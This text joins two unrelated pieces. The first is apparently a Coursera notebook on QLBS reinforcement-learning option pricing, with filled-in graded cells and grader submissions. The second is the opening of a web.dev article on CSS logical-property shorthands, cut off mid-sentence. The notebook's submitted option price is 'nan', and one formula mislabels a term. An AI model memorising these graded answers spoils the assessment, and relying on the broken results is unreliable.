M_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Psi_n\left(X_t^k,a_t^k\right)\left(R_t\left(X_t,a_t,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\right)}$$ Define function *function_S* and *function_M* to compute the value of matrix $\mathbf S_t$ and vector $\mathbf M_t$. **Instructions:** - implement function_S_vec() which computes $S_{nm}^{\left(t\right)}$ matrix - implement function_M_vec() which computes $M_n^{\left(t\right)}$ column vector ```python # vectorized functions def function_S_vec(t, S_t_mat, reg_param): """ function_S_vec - calculate S_{nm} matrix from Eq. (75) (with a regularization!) Eq. (75) in QLBS Q-Learner in the Black-Scholes-Merton article num_Qbasis = 3 x num_basis, 3 because of the basis expansion (1, a_t, 0.5 a_t^2) Arguments: t - time index, a scalar, an index into time axis of S_t_mat S_t_mat - pandas.DataFrame of dimension num_Qbasis x num_Qbasis x T reg_param - regularization parameter, a scalar Return: S_mat_reg - num_Qbasis x num_Qbasis """ ### START CODE HERE ### (≈ 4-5 lines of code) # S_mat_reg = your code goes here ... num_Qbasis = S_t_mat.shape[0] S_mat_reg = S_t_mat[:,:,t] + reg_param * np.eye(num_Qbasis) ### END CODE HERE ### return S_mat_reg def function_M_vec(t, Q_star, R, Psi_mat_t, gamma=gamma): """ function_S_vec - calculate M_{nm} vector from Eq. (75) (with a regularization!) Eq. (75) in QLBS Q-Learner in the Black-Scholes-Merton article num_Qbasis = 3 x num_basis, 3 because of the basis expansion (1, a_t, 0.5 a_t^2) Arguments: t- time index, a scalar, an index into time axis of S_t_mat Q_star - pandas.DataFrame of Q-function values of dimension N_MC x T R - pandas.DataFrame of rewards of dimension N_MC x T Psi_mat_t - pandas.DataFrame of dimension num_Qbasis x N_MC gamma - one time-step discount factor $exp(-r \delta t)$ Return: M_t - np.array of dimension num_Qbasis x 1 """ ### START CODE HERE ### (≈ 2-3 lines of code) # M_t = your code goes here ... M_t = np.dot(Psi_mat_t, R.loc[:,t] + gamma * Q_star.loc[:, t+1]) ### END CODE HERE ### return M_t ``` ```python ### GRADED PART (DO NOT EDIT) ### reg_param = 1e-3 np.random.seed(42) S_mat_reg = function_S_vec(T-1, S_t_mat, reg_param) idx_row = np.random.randint(low=0, high=S_mat_reg.shape[0], size=10) np.random.seed(42) idx_col = np.random.randint(low=0, high=S_mat_reg.shape[1], size=10) part_3 = list(S_mat_reg[idx_row, idx_col].flatten()) try: part3 = " ".join(map(repr, part_3)) except TypeError: part3 = repr(part_3) submissions[all_parts[2]]=part3 grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key,all_parts[:3],all_parts,submissions) S_mat_reg[idx_row, idx_col].flatten() ### GRADED PART (DO NOT EDIT) ### ``` Submission successful, please check on the coursera grader page for the status array([ 2.22709265e-01, 2.68165972e+02, 4.46911166e+01, 2.00678517e+00, 1.10020457e+03, 8.44758984e-01, 2.29671816e+02, 2.29671816e+02, 3.78571544e-03, 1.41884196e-02]) ```python ### GRADED PART (DO NOT EDIT) ### Q_RL = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Q_RL.iloc[:,-1] = - Pi.iloc[:,-1] - risk_lambda * np.var(Pi.iloc[:,-1]) Q_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Q_star.iloc[:,-1] = Q_RL.iloc[:,-1] M_t = function_M_vec(T-1, Q_star, R, Psi_mat[:,:,T-1], gamma) part_4 = list(M_t) try: part4 = " ".join(map(repr, part_4)) except TypeError: part4 = repr(part_4) submissions[all_parts[3]]=part4 grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key,all_parts[:4],all_parts,submissions) M_t ### GRADED PART (DO NOT EDIT) ### ``` Submission successful, please check on the coursera grader page for the status array([ -6.03245979e+01, -8.79998437e+01, -2.37497369e+02, -5.62543448e+02, 2.09052583e+02, -6.44961368e+02, -2.86243249e+03, 2.77687723e+03, -1.85728309e+03, -9.40505558e+03, 9.50610806e+03, -5.29328413e+03, -1.69800964e+04, 1.61026240e+04, -8.42698927e+03, -8.46211901e+03, 6.05144701e+03, -2.62196067e+03, -2.12066484e+03, 8.42176836e+02, -2.51624368e+02, -3.01116012e+02, 2.57124667e+01, -3.22639691e+00, -5.53769815e+01, 1.67390280e+00, -6.79562288e-02, -1.61140947e+01, 1.16524075e+00, -1.49934348e-01, -9.79117274e+00, -7.22309330e-02, -4.70108927e-01, -6.87393130e+00, -2.10244341e+00, -7.70293521e-01]) Call *function_S* and *function_M* for $t=T-1,...,0$ together with vector $\vec\Psi\left(X_t,a_t\right)$ to compute $\vec W_t$ and learn the Q-function $Q_t^\star\left(X_t,a_t\right)=\mathbf A_t^T\mathbf U_W\left(t,X_t\right)$ implied by the input data backward recursively with terminal condition $Q_T^\star\left(X_T,a_T=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$. When the vector $ \vec{W}_t $ is computed as per the above at time $ t $, we can convert it back to a matrix $ \bf{W}_t $ obtained from the vector $ \vec{W}_t $ by reshaping to the shape $ 3 \times M $. We can now calculate the matrix $ {\bf U}_t $ at time $ t $ for the whole set of MC paths as follows (this is Eq.(65) from the paper in a matrix form): $$ \mathbf U_{W} \left(t,X_t \right) = \left[\begin{matrix} \mathbf U_W^{0,k}\left(t,X_t \right) \\ \mathbf U_W^{1,k}\left(t,X_t \right) \\ \mathbf U_W^{2,k} \left(t,X_t \right) \end{matrix}\right] = \bf{W}_t \Phi_t \left(t,X_t \right) $$ Here the matrix $ {\bf \Phi}_t $ has the shape shape $ M \times N_{MC}$. Therefore, their dot product has dimension $ 3 \times N_{MC}$, as it should be. Once this matrix $ {\bf U}_t $ is computed, individual vectors $ {\bf U}_{W}^{1}, {\bf U}_{W}^{2}, {\bf U}_{W}^{3} $ for all MC paths are read off as rows of this matrix. From here, we can compute the optimal action and optimal Q-function $Q^{\star}(X_t, a_t^{\star}) $ at the optimal action for a given step $ t $. This will be used to evaluate the $ \max_{a_{t+1} \in \mathcal{A}} Q^{\star} \left(X_{t+1}, a_{t+1} \right) $. The optimal action and optimal Q-function with the optimal action could be computed by $$a_t^\star\left(X_t\right)=\frac{\mathbb{E}_{t} \left[ \Delta \hat{S}_{t} \hat{\Pi}_{t+1} + \frac{1}{2 \gamma \lambda} \Delta S_{t} \right]}{ \mathbb{E}_{t} \left[ \left( \Delta \hat{S}_{t} \right)^2 \right]}\, , \quad\quad Q_t^\star\left(X_t,a_t^\star\right)=\mathbf U_W^{\left(0\right)}\left(t,X_t\right)+ a_t^\star \mathbf U_W^{\left(2\right)}\left(t,X_t\right) +\frac{1}{2}\left(a_t^\star\right)^2\mathbf U_W^{\left(2\right)}\left(t,X_t\right)$$ with terminal condition $a_T^\star=0$ and $Q_T^\star\left(X_T,a_T^\star=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$. Plots of 5 optimal action $a_t^\star\left(X_t\right)$, optimal Q-function with optimal action $Q_t^\star\left(X_t,a_t^\star\right)$ and implied Q-function $Q_t^\star\left(X_t,a_t\right)$ paths are shown below. ## Fitted Q Iteration (FQI) ```python starttime = time.time() # implied Q-function by input data (using the first form in Eq.(68)) Q_RL = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Q_RL.iloc[:,-1] = - Pi.iloc[:,-1] - risk_lambda * np.var(Pi.iloc[:,-1]) # optimal action a_opt = np.zeros((N_MC,T+1)) a_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) a_star.iloc[:,-1] = 0 # optimal Q-function with optimal action Q_star = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Q_star.iloc[:,-1] = Q_RL.iloc[:,-1] # max_Q_star_next = Q_star.iloc[:,-1].values max_Q_star = np.zeros((N_MC,T+1)) max_Q_star[:,-1] = Q_RL.iloc[:,-1].values num_basis = data_mat_t.shape[2] reg_param = 1e-3 hyper_param = 1e-1 # The backward loop for t in range(T-1, -1, -1): # calculate vector W_t S_mat_reg = function_S_vec(t,S_t_mat,reg_param) M_t = function_M_vec(t,Q_star, R, Psi_mat[:,:,t], gamma) W_t = np.dot(np.linalg.inv(S_mat_reg),M_t) # this is an 1D array of dimension 3M # reshape to a matrix W_mat W_mat = W_t.reshape((3, num_basis), order='F') # shape 3 x M # make matrix Phi_mat Phi_mat = data_mat_t[t,:,:].T # dimension M x N_MC # compute matrix U_mat of dimension N_MC x 3 U_mat = np.dot(W_mat, Phi_mat) # compute vectors U_W^0,U_W^1,U_W^2 as rows of matrix U_mat U_W_0 = U_mat[0,:] U_W_1 = U_mat[1,:] U_W_2 = U_mat[2,:] # IMPORTANT!!! Instead, use hedges computed as in DP approach: # in this way, errors of function approximation do not back-propagate. # This provides a stable solution, unlike # the first method that leads to a diverging solution A_mat = function_A_vec(t, delta_S_hat, data_mat_t, reg_param) B_vec = function_B_vec(t, Pi_hat, delta_S_hat, S, data_mat_t) # print ('t = A_mat.shape = B_vec.shape = ', t, A_mat.shape, B_vec.shape) phi = np.dot(np.linalg.inv(A_mat), B_vec) a_opt[:,t] = np.dot(data_mat_t[t,:,:],phi) a_star.loc[:,t] = a_opt[:,t] max_Q_star[:,t] = U_W_0 + a_opt[:,t] * U_W_1 + 0.5 * (a_opt[:,t]**2) * U_W_2 # update dataframes Q_star.loc[:,t] = max_Q_star[:,t] # update the Q_RL solution given by a dot product of two matrices W_t Psi_t Psi_t = Psi_mat[:,:,t].T # dimension N_MC x 3M Q_RL.loc[:,t] = np.dot(Psi_t, W_t) # trim outliers for Q_RL up_percentile_Q_RL = 95 # 95 low_percentile_Q_RL = 5 # 5 low_perc_Q_RL, up_perc_Q_RL = np.percentile(Q_RL.loc[:,t],[low_percentile_Q_RL,up_percentile_Q_RL]) # print('t = %s low_perc_Q_RL = %s up_perc_Q_RL = %s' % (t, low_perc_Q_RL, up_perc_Q_RL)) # trim outliers in values of max_Q_star: flag_lower = Q_RL.loc[:,t].values < low_perc_Q_RL flag_upper = Q_RL.loc[:,t].values > up_perc_Q_RL Q_RL.loc[flag_lower,t] = low_perc_Q_RL Q_RL.loc[flag_upper,t] = up_perc_Q_RL endtime = time.time() print('\nTime Cost:', endtime - starttime, 'seconds') ``` /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:21: FutureWarning: reshape is deprecated and will raise in a subsequent release. Please use .values.reshape(...) instead /opt/conda/lib/python3.6/site-packages/numpy/lib/function_base.py:4116: RuntimeWarning: Invalid value encountered in percentile interpolation=interpolation) /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:77: RuntimeWarning: invalid value encountered in less /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:78: RuntimeWarning: invalid value encountered in greater ​ ​ Time Cost: 4.891070604324341 seconds ```python # plot both simulations f, axarr = plt.subplots(3, 1) f.subplots_adjust(hspace=.5) f.set_figheight(8.0) f.set_figwidth(8.0) step_size = N_MC // 10 idx_plot = np.arange(step_size, N_MC, step_size) axarr[0].plot(a_star.T.iloc[:, idx_plot]) axarr[0].set_xlabel('Time Steps') axarr[0].set_title(r'Optimal action $a_t^{\star}$') axarr[1].plot(Q_RL.T.iloc[:, idx_plot]) axarr[1].set_xlabel('Time Steps') axarr[1].set_title(r'Q-function $Q_t^{\star} (X_t, a_t)$') axarr[2].plot(Q_star.T.iloc[:, idx_plot]) axarr[2].set_xlabel('Time Steps') axarr[2].set_title(r'Optimal Q-function $Q_t^{\star} (X_t, a_t^{\star})$') plt.savefig('QLBS_FQI_off_policy_summary_ATM_eta_%d.png' % (100 * eta), dpi=600) plt.show() ``` ![png](/assets/img/rlhedge/unit3/output_59_0.png) Compare the optimal action $a_t^\star\left(X_t\right)$ and optimal Q-function with optimal action $Q_t^\star\left(X_t,a_t^\star\right)$ given by Dynamic Programming and Reinforcement Learning. Plots of 1 path comparisons are given below. ```python # plot a and a_star # plot 1 path num_path = 120 # 240 # 260 # 300 # 430 # 510 # Note that a from the DP method and a_star from the RL method are now identical by construction plt.plot(a.T.iloc[:,num_path], label="DP Action") plt.plot(a_star.T.iloc[:,num_path], label="RL Action") plt.legend() plt.xlabel('Time Steps') plt.title('Optimal Action Comparison Between DP and RL') plt.show() ``` ![png](/assets/img/rlhedge/unit3/output_61_0.png) ## Summary of the RL-based pricing with QLBS ```python # QLBS option price C_QLBS = - Q_star.copy() # Q_RL # print('---------------------------------') print(' QLBS RL Option Pricing ') print('---------------------------------\n') print('%-25s' % ('Initial Stock Price:'), S0) print('%-25s' % ('Drift of Stock:'), mu) print('%-25s' % ('Volatility of Stock:'), sigma) print('%-25s' % ('Risk-free Rate:'), r) print('%-25s' % ('Risk aversion parameter :'), risk_lambda) print('%-25s' % ('Strike:'), K) print('%-25s' % ('Maturity:'), M) print('%-26s %.4f' % ('\nThe QLBS Put Price 1 :', (np.mean(C_QLBS.iloc[:,0])))) print('%-26s %.4f' % ('\nBlack-Sholes Put Price:', bs_put(0))) print('\n') # # plot one path # plt.plot(C_QLBS.T.iloc[:,[200]]) # plt.xlabel('Time Steps') # plt.title('QLBS RL Option Price') # plt.show() ``` --------------------------------- QLBS RL Option Pricing --------------------------------- Initial Stock Price: 100 Drift of Stock: 0.05 Volatility of Stock: 0.15 Risk-free Rate: 0.03 Risk aversion parameter : 0.001 Strike: 100 Maturity: 1 The QLBS Put Price 1 : nan Black-Sholes Put Price: 4.5296 ​ ```python ### GRADED PART (DO NOT EDIT) ### part5 = str(C_QLBS.iloc[0,0]) submissions[all_parts[4]]=part5 grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key,all_parts[:5],all_parts,submissions) C_QLBS.iloc[0,0] ### GRADED PART (DO NOT EDIT) ### ``` Submission successful, please check on the coursera grader page for the status nan ```python # add here calculation of different MC runs (6 repetitions of action randomization) # on-policy values y1_onp = 5.0211 # 4.9170 y2_onp = 4.7798 # 7.6500 # QLBS_price_on_policy = 4.9004 +/- 0.1206 # these are the results for noise eta = 0.15 # p1 = np.array([5.0174, 4.9249, 4.9191, 4.9039, 4.9705, 4.6216 ]) # p2 = np.array([6.3254, 8.6733, 8.0686, 7.5355, 7.1751, 7.1959 ]) p1 = np.array([5.0485, 5.0382, 5.0211, 5.0532, 5.0184]) p2 = np.array([4.7778, 4.7853, 4.7781,4.7805, 4.7828]) # results for eta = 0.25 # p3 = np.array([4.9339, 4.9243, 4.9224, 5.1643, 5.0449, 4.9176 ]) # p4 = np.array([7.7696,8.1922, 7.5440,7.2285, 5.6306, 12.6072]) p3 = np.array([5.0147, 5.0445, 5.1047, 5.0644, 5.0524]) p4 = np.array([4.7842,4.7873, 4.7847, 4.7792, 4.7796]) # eta = 0.35 # p7 = np.array([4.9718, 4.9528, 5.0170, 4.7138, 4.9212, 4.6058]) # p8 = np.array([8.2860, 7.4012, 7.2492, 8.9926, 6.2443, 6.7755]) p7 = np.array([5.1342, 5.2288, 5.0905, 5.0784, 5.0013 ]) p8 = np.array([4.7762, 4.7813,4.7789, 4.7811, 4.7801]) # results for eta = 0.5 # p5 = np.array([4.9446, 4.9894,6.7388, 4.7938,6.1590, 4.5935 ]) # p6 = np.array([7.5632, 7.9250, 6.3491, 7.3830, 13.7668, 14.6367 ]) p5 = np.array([3.1459, 4.9673, 4.9348, 5.2998, 5.0636 ]) p6 = np.array([4.7816, 4.7814, 4.7834, 4.7735, 4.7768]) # print(np.mean(p1), np.mean(p3), np.mean(p5)) # print(np.mean(p2), np.mean(p4), np.mean(p6)) # print(np.std(p1), np.std(p3), np.std(p5)) # print(np.std(p2), np.std(p4), np.std(p6)) x = np.array([0.15, 0.25, 0.35, 0.5]) y1 = np.array([np.mean(p1), np.mean(p3), np.mean(p7), np.mean(p5)]) y2 = np.array([np.mean(p2), np.mean(p4), np.mean(p8), np.mean(p6)]) y_err_1 = np.array([np.std(p1), np.std(p3),np.std(p7), np.std(p5)]) y_err_2 = np.array([np.std(p2), np.std(p4), np.std(p8), np.std(p6)]) # plot it f, axs = plt.subplots(nrows=2, ncols=2, sharex=True) f.subplots_adjust(hspace=.5) f.set_figheight(6.0) f.set_figwidth(8.0) ax = axs[0,0] ax.plot(x, y1) ax.axhline(y=y1_onp,linewidth=2, color='r') textstr = 'On-policy value = %2.2f'% (y1_onp) props = dict(boxstyle='round', facecolor='wheat', alpha=0.5) # place a text box in upper left in axes coords ax.text(0.05, 0.15, textstr, fontsize=11,transform=ax.transAxes, verticalalignment='top', bbox=props) ax.set_title('Mean option price') ax.set_xlabel('Noise level') ax = axs[0,1] ax.plot(x, y2) ax.axhline(y=y2_onp,linewidth=2, color='r') textstr = 'On-policy value = %2.2f'% (y2_onp) props = dict(boxstyle='round', facecolor='wheat', alpha=0.5) # place a text box in upper left in axes coords ax.text(0.35, 0.95, textstr, fontsize=11,transform=ax.transAxes, verticalalignment='top', bbox=props) ax.set_title('Mean option price') ax.set_xlabel('Noise level') ax = axs[1,0] ax.plot(x, y_err_1) ax.set_title('Std of option price') ax.set_xlabel('Noise level') ax = axs[1,1] ax.plot(x, y_err_2) ax.set_title('Std of option price') ax.set_xlabel('Noise level') f.suptitle('Mean and std of option price vs noise level') plt.savefig('Option_price_vs_noise_level.png', dpi=600) plt.show() ``` ![png](/assets/img/rlhedge/unit3/output_65_0.png)
35.120584
401
0.648173
eng_Latn
0.506992
53801250da1404e25542a8d87f241c3917bca4c8
26,197
md
Markdown
google/dist/logical-property-shorthands/index.md
SKsakibul125/symmetrical-system
cb21d7a76d4821cc66dee6d41d12c1e0ef3a7335
[ "Unlicense" ]
7
2021-08-20T00:30:13.000Z
2022-02-17T17:28:46.000Z
google/dist/logical-property-shorthands/index.md
SKsakibul125/symmetrical-system
cb21d7a76d4821cc66dee6d41d12c1e0ef3a7335
[ "Unlicense" ]
15
2021-07-30T18:48:20.000Z
2022-03-26T12:42:22.000Z
google/dist/logical-property-shorthands/index.md
SKsakibul125/symmetrical-system
cb21d7a76d4821cc66dee6d41d12c1e0ef3a7335
[ "Unlicense" ]
3
2021-08-31T00:50:25.000Z
2022-01-25T16:38:20.000Z
<span class="w-tooltip w-tooltip--left">Open menu</span> <a href="/" class="header-default__logo-link gc-analytics-event"><img src="/images/lockup.svg" alt="web.dev" class="header-default__logo" width="125" height="30" /></a> <a href="/learn/" class="header-default__link gc-analytics-event">Learn</a> <a href="/measure/" class="header-default__link gc-analytics-event">Measure</a> <a href="/blog/" class="header-default__link gc-analytics-event">Blog</a> <a href="/about/" class="header-default__link gc-analytics-event">About</a> <span class="w-tooltip">Close</span> <a href="/" class="gc-analytics-event"><img src="/images/lockup.svg" alt="web.dev" class="drawer-default__logo" width="125" height="30" /></a> <a href="/learn/" class="drawer-default__link gc-analytics-event">Learn</a> <a href="/measure/" class="drawer-default__link gc-analytics-event">Measure</a> <a href="/blog/" class="drawer-default__link gc-analytics-event">Blog</a> <a href="/about/" class="drawer-default__link gc-analytics-event">About</a> <img src="https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format" alt="An inline flow arrow (right) and a block flow arrow (down)" class="w-hero w-hero--cover" sizes="100vw" srcset="https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=200 200w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=228 228w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=260 260w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=296 296w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=338 338w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=385 385w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=439 439w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=500 500w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=571 571w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=650 650w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=741 741w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=845 845w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=964 964w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=1098 1098w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=1252 1252w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=1428 1428w, https://web-dev.imgix.net/image/admin/GjMb0QfIM77KF22nEHcX.png?auto=format&amp;w=1600 1600w" width="1600" height="480" /> ## <a href="#logical-layout-enhancements-with-flow-relative-shorthands" class="w-toc__header--link">Logical layout enhancements with flow-relative shorthands</a> - [Document flow](#document-flow) - [New shorthands](#new-shorthands) - [Margin shorthands](#margin-shorthands) - [Padding shorthands](#padding-shorthands) - [Inset and shorthands](#inset-and-shorthands) - [Border shorthands](#border-shorthands) - [Logical property &lt;figure&gt; example](#logical-property-lessfiguregreater-example) - [Polyfilling and cross-browser support](#browser-compatibility) - [What's next](#what's-next) - [Feedback](#feedback) Share <a href="/newsletter/" class="w-actions__fab w-actions__fab--subscribe gc-analytics-event"><span>subscribe</span></a> - <a href="/" class="w-breadcrumbs__link w-breadcrumbs__link--left-justify gc-analytics-event">Home</a> - <a href="/blog" class="w-breadcrumbs__link gc-analytics-event">All articles</a> # Logical layout enhancements with flow-relative shorthands New logical property shorthands and new inset properties for Chromium. Oct 13, 2020 [<img src="https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?auto=format&amp;fit=crop&amp;h=64&amp;w=64" alt="Adam Argyle" class="w-author__image" sizes="(min-width: 64px) 64px, calc(100vw - 48px)" srcset="https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=1&amp;q=75 1x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=2&amp;q=50 2x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=3&amp;q=35 3x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=4&amp;q=23 4x, https://web-dev.imgix.net/image/admin/jdQIxAJrGuFOtwmuDfIn.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=5&amp;q=20 5x" width="64" height="64" />](/authors/adamargyle/) <a href="/authors/adamargyle/" class="w-author__name-link">Adam Argyle</a> - <a href="https://twitter.com/argyleink" class="w-author__link">Twitter</a> - <a href="https://github.com/argyleink" class="w-author__link">GitHub</a> - <a href="https://glitch.com/@argyleink" class="w-author__link">Glitch</a> - <a href="https://nerdy.dev" class="w-author__link">Blog</a> [<img src="https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?auto=format&amp;fit=crop&amp;h=64&amp;w=64" alt="Oriol Brufau" class="w-author__image" sizes="(min-width: 64px) 64px, calc(100vw - 48px)" srcset="https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=1&amp;q=75 1x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=2&amp;q=50 2x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=3&amp;q=35 3x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=4&amp;q=23 4x, https://web-dev.imgix.net/image/admin/uedrGuXN8MZ0tg11zsmK.jpg?fit=crop&amp;h=64&amp;w=64&amp;auto=format&amp;dpr=5&amp;q=20 5x" width="64" height="64" />](/authors/loirooriol/) <a href="/authors/loirooriol/" class="w-author__name-link">Oriol Brufau</a> - <a href="https://github.com/Loirooriol" class="w-author__link">GitHub</a> Since Chromium 69 (September 3rd 2018), [logical properties](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Logical_Properties) and values have helped developers maintain control of their international layouts through logical, rather than physical, direction and dimension styles. In Chromium 87, shorthands and offsets have shipped to make these logical properties and values a bit easier to write. This catches Chromium up to Firefox, which has had support for the shorthands [since 66](https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/66). Safari has them ready in their [tech preview](https://webkit.org/blog/11300/release-notes-for-safari-technology-preview-114/). ## <figure><img src="https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format" sizes="(min-width: 800px) 800px, calc(100vw - 48px)" srcset="https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=200 200w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=228 228w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=260 260w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=296 296w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=338 338w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=385 385w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=439 439w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=500 500w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=571 571w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=650 650w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=741 741w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=845 845w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=964 964w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=1098 1098w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=1252 1252w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=1428 1428w, https://web-dev.imgix.net/image/tcFciHGuF3MxnTr1y5ue01OGLBn2/t2y5tF9s3Wcp50kJJMmm.png?auto=format&amp;w=1600 1600w" width="800" height="577" /></figure>Document flow <a href="#document-flow" class="w-headline-link">#</a> If you're already familiar with logical properties, inline and block axes, and don't want a refresher, you can [skip ahead](#new-shorthands). Otherwise, here's a short refresher. In English, letters and words flow left to right while paragraphs are stacked top to bottom. In traditional Chinese, letters and words are top to bottom while paragraphs are stacked right to left. In just these 2 cases, if we write CSS that puts "margin top" on a paragraph, we're only appropriately spacing 1 language style. If the page is translated into traditional Chinese from English, the margin may well not make sense in the new vertical writing mode. Therefore the physical side of the box isn't very useful internationally. Thus begins the process of supporting multiple languages; learning about physical versus logical sides of the box model. **Key Term**: A _logical property_ is one that references a side, corner or axis of the box model in context of the applicable language direction. It's akin to referencing someone's `strong` arm, rather than assuming it's their `right` arm. "Right" is a physical arm reference, "strong" is a logical arm reference, **contextual to the individual**. Have you ever inspected the `p` element in Chrome DevTools? If so, you might have noticed that the [default User Agent styles](https://html.spec.whatwg.org/multipage/rendering.html#flow-content-3:~:text=blockquote%2C%20figure%2C%20listing%2C%20p%2C%20plaintext%2C%20pre%2C,%7D) are not physical, but logical. p { margin-block-start: 1em; margin-block-end: 1em; margin-inline-start: 0px; margin-inline-end: 0px; } <span class="small">CSS from [Chromium's User Agent Stylesheet](https://chromium.googlesource.com/chromium/blink/+/master/Source/core/css/html.css)</span> The margin is not on the top or bottom like an English reader might believe. It's `block-start` and `block-end`! These logical properties are akin to an English reader's top and bottom, but **also** akin to a Japanese reader as right and left. Written once, works everywhere. Normal flow is when the webpage is part of this multi-directionality intentionally. When page content updates according to document direction changes, the layout and its elements are considered in flow. Read more about "in" and "out" of flow [on 